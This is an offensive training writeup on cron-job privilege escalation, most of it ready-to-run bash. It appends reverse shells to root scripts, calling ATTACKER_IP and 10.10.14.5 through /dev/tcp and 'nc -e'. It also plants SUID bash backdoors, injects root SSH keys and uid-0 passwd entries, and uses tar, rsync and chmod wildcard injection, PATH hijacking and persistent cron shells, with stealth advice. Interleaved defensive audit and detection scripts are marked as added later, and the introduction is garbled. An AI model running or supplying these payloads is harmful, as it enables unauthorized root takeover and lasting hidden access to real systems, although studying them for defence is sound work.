Cron Job Exploitation

Intermediate | 35 min | Writeup

Various techniques to exploit cron jobs

Learning Objectives

  • Exploit writable cron scripts
  • Abuse PATH in cron jobs
  • Exploit wildcards in cron
  • Use pspy to find hidden cron

You've - now let's exploit them. From writable scripts to wildcard injection, cron jobs offer multiple privilege escalation vectors that execute on schedule without any user interaction.

The beauty of cron exploitation is its persistence. Once you've modified a cron script, your payload executes repeatedly. Set up a reverse shell, and it reconnects every time the job runs - even if your initial access is lost.

Timing Your Attack

Plan your exploitation around the cron schedule. A daily job at 3 AM means waiting hours. Prefer payloads that take effect on the first run, or go after the more frequently scheduled jobs first.

Writable Script Exploitation

```bash
# Scenario: Cron runs /opt/scripts/backup.sh as root
# You discover it's writable:
ls -la /opt/scripts/backup.sh
# -rwxrwxrwx 1 root root ... backup.sh

# Method 1: Add reverse shell
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/scripts/backup.sh

# Method 2: Copy bash SUID
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /opt/scripts/backup.sh
# After cron runs: /tmp/rootbash -p

# Method 3: Add your SSH key to root
echo 'echo "YOUR_PUBLIC_KEY" >> /root/.ssh/authorized_keys' >> /opt/scripts/backup.sh

# Method 4: Add user to /etc/passwd
echo 'echo "hacker:$(openssl passwd -1 password):0:0::/root:/bin/bash" >> /etc/passwd' >> /opt/scripts/backup.sh

# Method 5: Chmod shadow file (for later cracking)
echo 'chmod 644 /etc/shadow' >> /opt/scripts/backup.sh
```

Non-Destructive Payloads

Prefer payloads that don't break the original script functionality. Append to the end rather than replacing content to avoid detection.

Writable Directory Exploitation

```bash
# Scenario: Script directory is writable
ls -la /opt/scripts/
# drwxrwxrwx 2 root root ... scripts/

# Replace entire script
cat > /opt/scripts/backup.sh << 'EOF'
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
EOF
chmod +x /opt/scripts/backup.sh

# Or: Delete and recreate
rm /opt/scripts/backup.sh
echo '#!/bin/bash' > /opt/scripts/backup.sh
echo '/bin/bash -i >& /dev/tcp/ATTACKER/4444 0>&1' >> /opt/scripts/backup.sh
chmod +x /opt/scripts/backup.sh

# Symlink attack (if script doesn't exist)
# Cron references /opt/scripts/missing.sh
ln -s /tmp/evil.sh /opt/scripts/missing.sh
```

PATH Manipulation in Cron

```bash
# Check PATH in /etc/crontab
cat /etc/crontab
# PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin

# If cron script calls commands without full path:
# backup.sh contents:
# #!/bin/bash
# service mysql stop ← Not /usr/sbin/service!
# tar -czf /backup/db.tar.gz /var/lib/mysql
# service mysql start

# If /usr/local/sbin is writable:
echo '#!/bin/bash' > /usr/local/sbin/service
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /usr/local/sbin/service
chmod +x /usr/local/sbin/service

# When cron runs backup.sh, it finds our "service" first!

# Alternative: Create in writable PATH location
# If PATH contains a writable directory like /home/user/bin
```

Cron PATH

Cron jobs often have a limited PATH. Check /etc/crontab for the PATH setting. The first writable directory in PATH is your target.
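An added audit script, written for this edit rather than taken from the writeup, that checks for the conditions the writable-script, writable-directory and PATH sections rely on: a cron script or its directory writable by non-root users, and a writable or missing directory on cron's PATH. It assumes `stat -c` (GNU or busybox) and a system-style crontab with a user field; `/etc/crontab` at the end is only the default it reads when present.

```bash
#!/bin/bash
# Added audit example, not code from the original writeup: flags cron scripts
# (or their directories) writable by non-root users and writable or missing
# directories on cron's PATH. Assumes stat -c (GNU/busybox) and a
# system-style crontab: min hour dom mon dow user command.

# Report whether PATH is writable by group or other. Decided from the mode
# bits, not from test -w, so the result is the same when run as root.
check_writable() {
    local path="$1" mode
    if [ ! -e "$path" ]; then
        echo "MISSING $path"   # a missing PATH entry can be created if its parent is writable
        return 0
    fi
    mode=$(stat -c '%a' "$path")
    if [ $(( 8#$mode & 8#022 )) -ne 0 ]; then
        echo "WRITABLE $path ($mode)"
    else
        echo "OK $path ($mode)"
    fi
}

# Walk one crontab file: check every directory in a PATH= line, and for every
# job line check the script it runs plus the directory holding that script.
# @reboot-style lines and comments are skipped.
audit_crontab() {
    local file="$1" line cmd dir
    local -a dirs
    while IFS= read -r line; do
        case "$line" in
            ''|'#'*|@*) continue ;;
            PATH=*)
                IFS=: read -ra dirs <<< "${line#PATH=}"
                for dir in "${dirs[@]}"; do check_writable "$dir"; done ;;
            *)
                cmd=$(printf '%s\n' "$line" | awk '{print $7}')  # first word of the command
                [ -n "$cmd" ] || continue
                check_writable "$cmd"
                check_writable "$(dirname "$cmd")" ;;
        esac
    done < "$file"
}

if [ -r /etc/crontab ]; then
    audit_crontab /etc/crontab
fi
```

Any `WRITABLE` line is a finding: the script (or the directory that lets it be replaced or symlinked) should be `root:root` mode 755 or tighter, and a writable PATH entry should be removed from the crontab's `PATH=` or locked down.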

Wildcard Injection

When cron scripts use wildcards (*), you can create files that become malicious command arguments. This is especially powerful with tar, rsync, and chmod.

Tar Wildcard Injection

```bash
# Vulnerable cron script:
# #!/bin/bash
# cd /var/backups
# tar -czf backup.tar.gz *

# When * expands, filenames become arguments:
# tar -czf backup.tar.gz file1 file2 --checkpoint=1 --checkpoint-action=exec=shell.sh

# Create the exploit:
cd /var/backups
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > shell.sh
chmod +x shell.sh
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=shell.sh'

# Alternative with reverse shell:
echo '/bin/bash -i >& /dev/tcp/ATTACKER/4444 0>&1' > shell.sh
chmod +x shell.sh
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=shell.sh'

# When cron runs tar, it executes shell.sh as root!
```

Rsync Wildcard Injection

```bash
# Vulnerable cron script:
# rsync -a * user@backup:/backup/

cd /target/directory
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > shell.sh
chmod +x shell.sh
touch -- '-e sh shell.sh'

# rsync interprets -e as the remote shell command
```

Chmod Wildcard Injection

```bash
# Vulnerable cron script:
# chmod 700 /opt/data/*

cd /opt/data
touch -- '--reference=/etc/passwd'
# chmod applies /etc/passwd permissions to files

# Or use recursive
touch -- '-R'
touch -- '--reference=/tmp/evil'
```

Filename as Argument

The key insight: when wildcards expand, filenames become command-line arguments. A file named "--checkpoint=1" becomes the argument --checkpoint=1 to tar.
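A defender-side companion to the tar, rsync and chmod cases above, added for this edit and not part of the writeup: one function lists the entries in a directory that a bare `*` would hand to a command as options, and another is the hardened form of the backup command. It requires `tar`; the directory and archive paths are whatever the caller passes.

```bash
#!/bin/bash
# Added defender-side example, not code from the original writeup, covering
# the tar, rsync and chmod wildcard cases above. Requires tar; directory and
# archive paths are whatever the caller passes.

# Print the name of every entry in DIR that begins with "-", one per line.
# Such names only reach a command as options when the glob is a bare "*"
# after cd; a prefixed glob such as "./*" or "/opt/data/*" expands to paths
# that never start with "-".
find_option_names() {
    local dir="$1" f
    for f in "$dir"/-*; do
        [ -e "$f" ] || continue   # glob matched nothing
        printf '%s\n' "${f##*/}"
    done
}

# Hardened form of "cd DIR && tar -czf ARCHIVE *": with ./* the expansion
# of "--checkpoint=1" is "./--checkpoint=1", which tar stores as an ordinary
# file instead of parsing as an option. "rsync -a ./* dest" and
# "chmod 700 ./*" get the same protection; GNU tools also accept "--" before
# the glob to end option parsing. ARCHIVE should be an absolute path outside DIR.
safe_archive() {
    local dir="$1" archive="$2"
    ( cd "$dir" && tar -czf "$archive" ./* )
}

# Count entries inside ARCHIVE whose stored name starts with "./-": these are
# the files a bare "*" would have turned into options.
count_archived_option_names() {
    tar -tzf "$1" | grep -c '^\./-' || true
}
```

Run `find_option_names` against every directory a root cron job globs in; any output means a file is already positioned to be parsed as an option and the job needs the `./*` or `--` fix.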

Environment Variable Abuse

```bash
# Some cron setups inherit or set environment variables

# Check for env vars in crontab
cat /etc/crontab
# SHELL=/bin/bash
# PATH=/usr/local/sbin:/usr/local/bin
# MAILTO=root
# HOME=/root

# If HOME is writable (rare but check):
# Create malicious .bashrc that runs on bash cron jobs

# If MAILTO is set:
# Cron mails output - potential info leakage
# Can't exploit directly but reveals info

# For user crontabs:
# If cron runs bash scripts, .bashrc might execute
```

Creating Persistence

```bash
# Once you have root, add your own cron job:

# Method 1: System crontab
echo '* * * * * root bash -i >& /dev/tcp/ATTACKER/4444 0>&1' >> /etc/crontab

# Method 2: Cron.d file
echo '* * * * * root /tmp/shell.sh' > /etc/cron.d/persistence

# Method 3: User crontab
crontab -e
# Add: * * * * * /tmp/shell.sh

# Method 4: Hourly/daily directories
cp /tmp/shell.sh /etc/cron.hourly/
chmod +x /etc/cron.hourly/shell.sh

# Shell script for persistence:
#!/bin/bash
if ! pgrep -x "reverse_shell" > /dev/null; then
    bash -i >& /dev/tcp/ATTACKER/4444 0>&1
fi
```
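A detection counterpart to the persistence methods above, added for this edit and not part of the writeup: it reads crontab lines (system or per-user format) and flags the patterns those methods leave behind. The match strings are assumptions about what a hunt would look for, not a complete rule set.

```bash
#!/bin/bash
# Added detection example, not code from the original writeup. It scans
# crontab lines (system or per-user format) for the persistence patterns
# listed above. The match strings are assumptions about what a hunt would
# look for, not a complete rule set: treat hits as leads to review.

# Read crontab lines from stdin and print, for each match,
#   SUSPECT <reason>[ <reason>...] | <line>
# Reasons: tmpdir (command under /tmp or /dev/shm), revshell (/dev/tcp,
# "nc -e" or "bash -i"), everyminute (a "* * * * *" schedule).
flag_cron_lines() {
    local line reasons
    while IFS= read -r line; do
        case "$line" in ''|'#'*) continue ;; esac
        reasons=""
        case "$line" in */tmp/*|*/dev/shm/*) reasons="$reasons tmpdir" ;; esac
        case "$line" in */dev/tcp/*|*"nc -e "*|*"bash -i "*) reasons="$reasons revshell" ;; esac
        case "$line" in "* * * * *"*) reasons="$reasons everyminute" ;; esac
        if [ -n "$reasons" ]; then
            printf 'SUSPECT%s | %s\n' "$reasons" "$line"
        fi
    done
}

# Number of suspect lines across one or more crontab files
# (for example /etc/crontab and the files in /etc/cron.d).
count_suspect() {
    cat "$@" | flag_cron_lines | grep -c '^SUSPECT' || true
}

if [ -r /etc/crontab ]; then
    flag_cron_lines < /etc/crontab
fi
```

Pair this with a check that nothing in `/etc/cron.hourly` and friends was added outside package management, since Method 4 above leaves no crontab line to match.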

Complete Payload Examples

```bash
# 1. SUID bash backdoor (silent, persistent)
cat > /tmp/payload.sh << 'EOF'
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod u+s /tmp/rootbash
EOF

# After: /tmp/rootbash -p

# 2. Reverse shell (active connection)
cat > /tmp/payload.sh << 'EOF'
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
EOF

# 3. SSH key injection (stealth)
cat > /tmp/payload.sh << 'EOF'
#!/bin/bash
mkdir -p /root/.ssh
echo "ssh-rsa AAAA...your_key... attacker@kali" >> /root/.ssh/authorized_keys
chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys
EOF

# 4. New root user (obvious but effective)
cat > /tmp/payload.sh << 'EOF'
#!/bin/bash
echo 'pwned:$1$salt$hash:0:0:root:/root:/bin/bash' >> /etc/passwd
EOF

# 5. Netcat listener (if nc available)
cat > /tmp/payload.sh << 'EOF'
#!/bin/bash
nc -e /bin/bash 10.10.14.5 4444
EOF
```

Cron Exploitation Methodology

Cron Attack Flow

1. Identify: Find cron jobs running as root
2. Analyze: Check script content and permissions
3. Vector: Choose writable script, PATH, or wildcard
4. Payload: Prepare the appropriate exploit payload
5. Deploy: Inject the payload and wait for execution
6. Verify: Confirm root access when cron runs

Knowledge Check

Quick Quiz

How does tar wildcard injection work?

Challenges

Wildcard Exploit

Challenge (intermediate)

A cron job runs 'tar -czf /backup/data.tar.gz *' in /var/data/ as root every 5 minutes. Exploit it to gain root.


Key Takeaways

  • Writable cron scripts = immediate root code execution
  • PATH manipulation works when scripts use relative commands
  • Wildcard injection: filenames become command arguments
  • tar --checkpoint-action is the classic wildcard exploit
  • Append payloads to maintain stealth and functionality
  • SUID bash backdoor provides persistent access